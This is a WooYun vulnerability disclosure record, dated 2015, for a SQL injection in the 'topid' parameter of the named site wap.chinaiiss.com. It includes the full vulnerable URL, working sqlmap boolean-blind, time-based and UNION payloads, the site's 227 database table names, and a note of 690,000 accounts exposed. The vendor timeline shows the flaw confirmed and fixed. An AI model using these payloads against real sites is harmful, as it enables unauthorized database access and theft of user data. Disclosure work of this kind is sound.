乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-04: 细节已通知厂商并且等待厂商处理中 2015-10-08: 厂商已经确认,细节仅向厂商公开 2015-10-09: 厂商已经修复漏洞并主动公开,细节向公众公开
http://wap.chinaiiss.com/do.php?ac=getnextarticle&do=touch&inajax=1&number=15&topid=4&vtype=touch 注入点:topid
CIS库:
sqlmap resumed the following injection point(s) from stored session:---Parameter: topid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ac=getnextarticle&do=touch&inajax=1&number=15&topid=4 AND 8593=8593&vtype=touch Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: ac=getnextarticle&do=touch&inajax=1&number=15&topid=4 AND (SELECT * FROM (SELECT(SLEEP(5)))ZEyk)&vtype=touch Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: ac=getnextarticle&do=touch&inajax=1&number=15&topid=4 UNION ALL SELECT CONCAT(0x7178766a71,0x76596154616954595344,0x7178787671),NULL,NULL,NULL,NULL-- &vtype=touch---web application technology: PHP 5.3.6back-end DBMS: MySQL 5.0.12Database: cis[227 tables]+-------------------------------+| forum_remark || iiss_admin || iiss_adminsession || iiss_admintype || iiss_answer || iiss_article || iiss_article_hezuo || iiss_article_sendmail || iiss_article_special || iiss_article_specialfield || iiss_articlefield || iiss_articlemodify || iiss_articlerelated || iiss_attachment || iiss_banned || iiss_blogger_iprecord || iiss_blogger_vote || iiss_bottom || iiss_clickcount || iiss_clickinfo || iiss_clicklocation || iiss_clickrecord || iiss_conference || iiss_conference_author_praise || iiss_conference_candidate || iiss_conference_praise_record || iiss_conference_user_medal || iiss_contest || iiss_contest_question || iiss_contest_record || iiss_contest_userquestion || iiss_contest_userscore || iiss_country || iiss_country_area || iiss_datatype || iiss_day || iiss_defense_elite || iiss_delrecord || iiss_downimage || iiss_facecount || iiss_figure || iiss_figure_character || iiss_figure_impression || iiss_figure_year || iiss_file_attachment || iiss_guestbook || iiss_hero || iiss_hire || iiss_history_today || iiss_hours || iiss_hours2 || iiss_image || iiss_image_comic || iiss_imagefield || iiss_index_accesslog || iiss_infocategory || iiss_infocomment || iiss_infomodel || iiss_jump || iiss_leader || iiss_links || iiss_links_record || iiss_linkscooper || iiss_linkstype || iiss_list_accesslog || iiss_livetelecast || iiss_livetelecast_article || iiss_member || iiss_member_failedlogins || iiss_member_field || iiss_member_recommend || iiss_member_verifycode || iiss_member_verifycode2 || iiss_milarea || iiss_milcontrast || iiss_milcountry || iiss_milcountryelse || iiss_mobile_apps || iiss_mobile_article || iiss_mobile_conference || iiss_mobile_image || iiss_mobile_manual || iiss_mobile_pk || iiss_mobile_version || iiss_mobile_wallpaper || iiss_navi || iiss_people || iiss_perspective || iiss_perspectivefield || iiss_pk || iiss_pkvote || iiss_pkvoteuser || iiss_promotion_iprecord || iiss_promotionlink || iiss_promotionstatistics || iiss_question || iiss_quick_member || iiss_review_record || iiss_session || iiss_sethome || iiss_spec_baodiaovote || iiss_spec_baodiaovotetotal || iiss_spec_nanhai || iiss_spec_qiongdingzhixia || iiss_spec_seekones || iiss_special || iiss_special_foruminfo || iiss_spiderpic || iiss_sysdata || iiss_table || iiss_tag || iiss_tagart || iiss_tagartspec || iiss_taghero || iiss_tagimg || iiss_tagperspective || iiss_tagsend || iiss_updatearticle || iiss_userquestion || iiss_viewrecord_201002 || iiss_viewrecord_201003 || iiss_viewrecord_201004 || iiss_viewrecord_201005 || iiss_viewrecord_201006 || iiss_viewrecord_201007 || iiss_viewrecord_201008 || iiss_viewrecord_201009 || iiss_viewrecord_201010 || iiss_viewrecord_201011 || iiss_viewrecord_201012 || iiss_viewrecord_201101 || iiss_viewrecord_201102 || iiss_viewrecord_201103 || iiss_viewrecord_201104 || iiss_viewrecord_201105 || iiss_viewrecord_201106 || iiss_viewrecord_201107 || iiss_viewrecord_201108 || iiss_viewrecord_201109 || iiss_viewrecord_201110 || iiss_viewrecord_201111 || iiss_viewrecord_201112 || iiss_viewrecord_201201 || iiss_viewrecord_201202 || iiss_viewrecord_201203 || iiss_viewrecord_201204 || iiss_viewrecord_201205 || iiss_viewrecord_201206 || iiss_viewrecord_201207 || iiss_viewrecord_201208 || iiss_viewrecord_201209 || iiss_viewrecord_201210 || iiss_viewrecord_201211 || iiss_viewrecord_201212 || iiss_viewrecord_201301 || iiss_viewrecord_201302 || iiss_viewrecord_201303 || iiss_viewrecord_201304 || iiss_viewrecord_201305 || iiss_viewrecord_201306 || iiss_viewrecord_201307 || iiss_viewrecord_201308 || iiss_viewrecord_201309 || iiss_viewrecord_201310 || iiss_viewrecord_201311 || iiss_viewrecord_201312 || iiss_viewrecord_201401 || iiss_viewrecord_201402 || iiss_viewrecord_201403 || iiss_viewrecord_201404 || iiss_viewrecord_201405 || iiss_viewrecord_201406 || iiss_viewrecord_201407 || iiss_viewrecord_201408 || iiss_viewrecord_201409 || iiss_viewrecord_201410 || iiss_viewrecord_201411 || iiss_viewrecord_201412 || iiss_viewrecord_201501 || iiss_viewrecord_201502 || iiss_viewrecord_201503 || iiss_viewrecord_201504 || iiss_viewrecord_201505 || iiss_viewrecord_201506 || iiss_viewrecord_201507 || iiss_viewrecord_201508 || iiss_viewrecord_201509 || iiss_viewrecord_201510 || iiss_viewrecord_day || iiss_viewrecord_daybysite || iiss_voice || iiss_voice_news || iiss_vote || iiss_votetype || iiss_voteuser || iiss_wap_article || iiss_wap_image || iiss_wap_pk || iiss_weaponspec || iiss_weibo_activeusers || iiss_weibo_friendships || iiss_weibo_repost || iiss_weibo_repostrecord || iiss_weibo_repostusers_record || iiss_weibo_tokenuser || iiss_weibo_users || iiss_wikipedia || iiss_wikipediaedition || iiss_wikipediafield || iiss_worship || iiss_writer || iiss_writerart || iiss_writerartfield || iiss_yearvoterecord || iissblog_album || iissblog_blog || iissblog_blog2 || iissblog_class || iissblog_comment || iissblog_favorites || iissblog_feed || iissblog_log || iissblog_pic || iissblog_pic_favorites || iissblog_user || iissblog_user_20140806 || iissblog_viewnum |+-------------------------------+
69万账户:
危害等级:高
漏洞Rank:20
确认时间:2015-10-08 23:54
感谢支持
2015-10-09:已修复,感谢支持
2015-10-09:感谢支持